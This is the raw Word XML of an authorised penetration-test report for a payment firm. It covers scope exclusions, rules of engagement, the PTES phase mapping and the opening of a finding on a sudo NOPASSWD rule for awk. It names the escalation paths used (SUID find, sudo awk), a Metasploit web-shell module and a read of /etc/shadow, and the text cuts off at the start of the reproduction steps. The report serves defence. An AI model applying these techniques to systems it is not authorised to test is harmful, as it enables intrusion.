        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Explicit exclusions: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>the following techniques were placed outside the engagement's scope by written agreement before any scanning began:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6150158B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>• Kernel-level exploits against the host operating systems. These were excluded because the assets share a kernel branch (2.6.24) with staging systems whose stability the client cannot risk during business hours; the cost of an accidental kernel panic and the time required to restore the asset exceed the marginal value of demonstrating a kernel exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58575CAC" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>• Denial-of-service techniques against any target. Cassandra Pay processes time-sensitive payments and cannot accept the risk of a service interruption introduced by the test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8B10E5" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>• Lateral movement to neighbouring assets reachable from cassandra-stg-01 (the rest of the staging segment, the production segment via shared services, and the internal corporate network).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3413F5F0" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>• Social engineering against Cassandra Pay employees or contractors. The contract is technical-only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCEBC5E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>• Exfiltration of any real customer data. Where credential files were read as part of demonstrating a finding, the read was performed once for evidence and the data was not copied off the asset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221D6D98" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc229906570"/>
      <w:r>
        <w:t>3.2  Rules of Engagement summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="5E02150B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Testing windows were 09:00–18:00 UTC+3, Monday through Friday, with no out-of-hours work permitted. The primary client point-of-contact for in-engagement incident escalation was the CISO's deputy (V. Smirnova, +7-7XX-XXX-XXXX), reachable through a Signal channel established before the engagement began. The agreed escalation procedure was that any unexpected impact to the asset (loss of SSH connectivity, abnormal log volumes, alert pages) would be communicated within 15 minutes of detection, and that testing would pause pending the client's clearance. No such incident occurred during the engagement. The Rules of Engagement document was signed by both parties on 11 April 2026 and is held in the engagement's master folder; this section summarises its operational implications but does not replace the document itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EE2303" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc229906571"/>
      <w:r>
        <w:t>3.3  Methodology — PTES Phase Mapping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="1AC1DFAB" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The assessment followed the seven-phase Penetration Testing Execution Standard (PTES). For brevity, this section maps the work into phases without restating the standard. The standard itself is publicly available at pentest-standard.org.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26"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E57A4" w14:paraId="17EB9D1D" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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1AAE51BB" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>PTES phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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2C8225A9" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Activities performed during this engagement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="6B617FBA"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4F71769" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>1. Pre-engagement Interactions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649E19F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Scope definition, ROE signing (11 Apr), test windows agreed, escalation channels established. Output: signed engagement letter and ROE document.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="415AF9CA"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166E0326" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>2. Intelligence Gathering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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157B96F5" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Limited OSINT on Cassandra Pay's public footprint; in-scope assets were known by IP/hostname, so reconnaissance focused on the assets themselves (port discovery, service version identification).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="7DD13CD7"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A2D8A7B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>3. Threat Modeling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0267132" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Lightweight per the engagement size: defined that the worst-case scenarios were (a) compromise of payment-tokeniser confidentiality and (b) integrity loss on the vendor VM before purchase decisions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="46380FF0"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F17EE5A" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>4. Vulnerability Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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341FE244" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Phase 1: enumeration of SUID surface, /etc/sudoers analysis via sudo -l, manual inspection of mount options and PAM configuration. Phase 2: nmap version scan, manual web reconnaissance, identification of LotusCMS 3.0 footer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="2969628E"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FC83DBB" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>5. Exploitation</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FF51D13" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Phase 1: privilege escalation via SUID find (GTFOBins) and via sudo NOPASSWD awk. Phase 2: Metasploit module exploit/multi/http/lcms_php_exec → web shell as www-data; further enumeration to MySQL via credentials in gconfig.php.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="1C32893D"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AF6B6C7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>6. Post-Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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5CEDE49" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Read-only validation of access (e.g., a single read of /etc/shadow to prove euid=0 was real); no persistence implants placed, no credentials exfiltrated, no configuration changes left on either asset.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="6C03BA9B" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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9C7A03B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>7. Reporting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A5AE4AE" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>This document. Drafting began 24 Apr; internal QA review 28 Apr; final release 13 May.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="661AAC84" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2859267C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc229906572"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4. Technical Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="7F26376A" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This section documents five vulnerabilities identified during the engagement. Each finding follows an eight-field anatomy consistent with the PTES reporting standard: Title, Severity (with CVSS v3.1 base, vector, and a contextual justification), Affected Asset, Description, Steps to Reproduce, Evidence, Recommendation, and References. Findings are presented in priority order — the first finding describes the fastest path from a low-privilege foothold to full administrative control of the production-class asset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7828CB93" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc229906573"/>
      <w:r>
        <w:t>Finding F1: Over-permissive sudo rule grants unrestricted privilege escalation via awk</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="5016C029" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>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600"/>
        <w:gridCol w:w="3200"/>
        <w:gridCol w:w="2826"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E57A4" w14:paraId="48EC03EA" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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13D6C52E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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315738D9" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>CVSS v3.1 base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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7A2CAD14" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Vector string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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1EF8C6B6" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Affected asset</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="0623C770"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E5E5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="215F1302" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE5E5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5768F5E3" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>8.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE5E5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70ADEE36" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2826" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE5E5"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B988B45" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>cassandra-stg-01 (10.42.7.15), /etc/sudoers line 92</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25A6C059" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092DD3B4" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity justification: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CVSS 8.8 Critical with Scope Changed because cassandra-stg-01 holds a partial canary copy of the payment-tokeniser service; a root shell crosses the authorisation boundary into a domain whose confidentiality and integrity matter beyond the host itself. The PR:L value reflects that an attacker must first hold a low-privilege account (the assumed precondition of this engagement). The S:C flip was the subject of the iteration documented in Appendix C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1F4ACD" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51856CF8" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc229906574"/>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="06B23F69" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The sudoers file contains the rule msfadmin ALL=(ALL) NOPASSWD: /usr/bin/awk, which allows any session of the msfadmin staff account to run /usr/bin/awk as root without entering a password. The rule appears to have been added to support an automated log-parsing task that runs as part of a maintenance cron job and reads files owned by root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F376666" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The issue is that awk is not a narrow utility. It is a Turing-complete programming language with a BEGIN block that runs before any input is read, and with a built-in system() function. The combination means that the rule is functionally equivalent to msfadmin ALL=(ALL) NOPASSWD: ALL — anything the operating system can run, this rule allows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B604D4C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This is the classic "NOPASSWD on a wide tool" pattern in the Linux privilege-escalation literature. The administrator who added the rule almost certainly intended a narrow operational allowance and did not test whether awk's shell-escape primitive applied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088201DA" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc229906575"/>
      <w:r>
        <w:t>Steps to reproduce</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="7E8DC63C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:eastAsia="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>$ sudo -l         # Lists allowed commands; confirms the NOPASSWD entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFAD4EC" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
